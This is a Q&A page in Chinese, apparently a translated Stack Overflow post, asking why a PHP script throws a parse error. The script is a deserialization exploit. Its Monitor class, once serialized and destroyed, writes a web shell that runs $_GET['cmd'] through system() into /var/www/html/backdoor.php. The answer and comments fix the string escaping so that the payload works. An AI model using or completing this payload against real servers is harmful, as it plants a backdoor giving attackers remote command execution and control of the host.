创建一个序列化对象php [重复]答案

【问题标题】：Create a Serialized Object php [duplicate]创建一个序列化对象php [重复]
【发布时间】：2022-01-08 13:59:02
【问题描述】：

我已经改变了很多次，但没有任何效果。有人能帮我吗。谢谢！

PHP 解析错误：语法错误，意外的 '$_GET' (T_VARIABLE)，需要 ',' 或 ';'

<?php
class Monitor
{
  public $filename = "/var/www/html/backdoor.php";
  public $content = "<?php system("$_GET['cmd']"); ?>";
  public function __destruct()
  {
    file_put_contents($this->filename,$this->content);
  }
  public function __toString()
  {
    return "Return the message ".$this->filename." ".$this->content."<br>"; 
  }
}
$exploit = new Monitor();
echo serialize($exploit);
?>

【问题讨论】：

标签： php serialization

【解决方案1】：

你需要转义你的引号：

public $content = "<?php system(\"$_GET['cmd']\"); ?>";

【讨论】：

PHP 解析错误：语法错误，意外 '"'，期望标识符 (T_STRING) class Monitor { public $filename = "/var/www/html/backdoor.php"; public $content = "<?php system(\"$_GET[cmd]\"); ?>"; public function __destruct() { file_put_contents($this->filename,$this->content); } public function __toString() { return "Return the message ".$this->filename." ".$this->content."<br>"; } } $exploit = new Monitor(); echo serialize($exploit); ?>
这次你少了cmd周围的单引号
PHP 解析错误：语法错误，意外 '"'，期望标识符 (T_STRING) class Monitor { public $filename = "/var/www/html/backdoor.php"; public $content = "<?php system(\"$_GET['cmd']\"); ?>"; public function __destruct() { file_put_contents($this->filename,$this->content); } public function __toString() { return "Return the message ".$this->filename." ".$this->content."<br>"; } } $exploit = new Monitor(); echo serialize($exploit); ?>